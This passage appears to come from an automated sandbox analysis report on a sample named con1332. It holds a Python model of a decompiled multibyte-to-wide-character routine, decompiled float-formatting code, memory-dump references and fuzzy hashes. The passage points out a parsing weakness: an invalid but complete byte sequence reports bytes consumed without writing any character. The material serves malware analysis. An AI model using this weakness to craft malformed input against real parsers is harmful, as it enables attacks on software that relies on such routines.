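    wide_char is None whenever the routine would not have written *pwc.
    """
    # Prologue (s == NULL / n == 0) is not in the fragment; assumed to return 0.
    if not s or n == 0:
        return (0, None, 0)
    n = min(n, len(s))  # the model only reads bytes that exist; the C code trusts the caller's n
    if s[0] == 0:
        return (0, "\x00", 0)          # *pwc = 0, exit through L5
    if c_locale:
        return (1, chr(s[0]), 0)       # fast path: byte copied into *pwc unchanged, return 1
    if not is_lead_byte_cp932(s[0]):
        # single-byte path: MultiByteToWideChar(cp, MB_PRECOMPOSED | MB_ERR_INVALID_CHARS, s, 1, pwc, 1)
        try:
            return (1, s[:1].decode(codepage), 0)   # L10
        except UnicodeDecodeError:
            return (-1, None, EILSEQ)               # L21
    # lead byte: strict conversion of mb_cur_max bytes, attempted only when that many bytes were supplied
    if mb_cur_max > 1 and n >= mb_cur_max:
        try:
            return (mb_cur_max, s[:mb_cur_max].decode(codepage), 0)   # L19
        except UnicodeDecodeError:
            pass  # conversion failed: fall through to the lenient check at L17
    # L17: only a short buffer or a NUL trail byte is turned into EILSEQ ...
    trail = s[1] if len(s) > 1 else 0
    if n < mb_cur_max or trail == 0:
        return (-1, None, EILSEQ)      # L21
    # ... so an invalid but complete sequence still returns mb_cur_max with *pwc untouched (L19)
    return (mb_cur_max, None, 0)


if __name__ == "__main__":
    # constructed inputs: ASCII, a valid 2-byte character, a truncated one, a NUL trail byte, an invalid trail byte
    for sample, n in [(b"A", 1), (b"\x82\xa0", 2), (b"\x82\xa0", 1), (b"\x82\x00", 2), (b"\x82\x20", 2)]:
        print(sample, n, mbtowc_model(sample, n))
```

The last row of the demonstration is the one to keep in mind when a parser uses the return value of such a routine to advance through attacker-controlled bytes: the count says "two bytes consumed" while the output character was never written.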
Address column of the decompiler view for the listing above (one entry per statement, in listing order; 0x00000000 entries have no mapped address):
0x004152a9 0x004152b0 0x004152c7 0x00000000 0x004152b7 0x004152b9 0x004152d3 0x004152d8 0x004152db 0x004152de 0x00415307 0x0041530e 0x00415310 0x00415391 0x004153ac 0x004153ae 0x004152ee 0x004152ee 0x004152f1 0x004152f3 0x004152f6 0x004152f6 0x004152f6 0x004152f6 0x00000000 0x004152fc 0x00415370 0x00415370 0x00415375 0x0041537b 0x0041537e 0x00415380 0x00415383 0x00415383 0x00415383 0x00415383 0x00000000 0x00415387 0x00415312 0x00415315 0x0041531b 0x0041531e 0x00415345 0x00415348 0x0041534e 0x00000000 0x00000000 0x00415350 0x00415353 0x00000000 0x00000000 0x00415355 0x00415355 0x0041535b 0x0041535e 0x004152cc 0x004152cc 0x00415367 0x00000000 0x00415367 0x00415320 0x00415323 0x00000000 0x00000000 0x00415327 0x00415338 0x0041533e 0x00415340 0x00415343 0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00415343
                                                                                                                                                                                                                                    0x004152e0
                                                                                                                                                                                                                                    0x004152e3
                                                                                                                                                                                                                                    0x004152e5
                                                                                                                                                                                                                                    0x004152eb
                                                                                                                                                                                                                                    0x004152eb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004152bb
                                                                                                                                                                                                                                    0x004152bb
                                                                                                                                                                                                                                    0x004152c0
                                                                                                                                                                                                                                    0x004152c4
                                                                                                                                                                                                                                    0x004152c4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004152c0
                                                                                                                                                                                                                                    0x004152b9

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
• Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
Uniqueness

Uniqueness Score: -1.00%

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C0553A
• __isleadbyte_l.LIBCMT ref: 02C0556E
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C0559F
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C0560D
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction ID: 617b3922c88b9b94f4ac194e8fa1c596134cdede7e75f8295294275546ce3ea2
• Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction Fuzzy Hash: 5B31A231A14245EFDB20DF64C8C4ABE3BA6FF41394F9445A9E5658B1E0E730DA40DF50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
	intOrPtr _t25;
	void* _t26;
	void* _t28;

	_t25 = _a16;
	if(_t25 == 0x65 || _t25 == 0x45) {
		_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
		goto L9;
	} else {
		_t34 = _t25 - 0x66;
		if(_t25 != 0x66) {
			__eflags = _t25 - 0x61;
			if(_t25 == 0x61) {
				L7:
				_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
			} else {
				__eflags = _t25 - 0x41;
				if(__eflags == 0) {
					goto L7;
				} else {
					_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
				}
			}
			L9:
			return _t26;
		} else {
			return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
		}
	}
}


APIs
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: 949df42e1c195bce24a16d1e7e7eeae065619bf253fc116ad9da7e6616097013
• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: F0117E7200018ABBCF125F89CD85CEE3F63BB49354B498495FA285A070D336DAB1AB81
Uniqueness

Uniqueness Score: -1.00%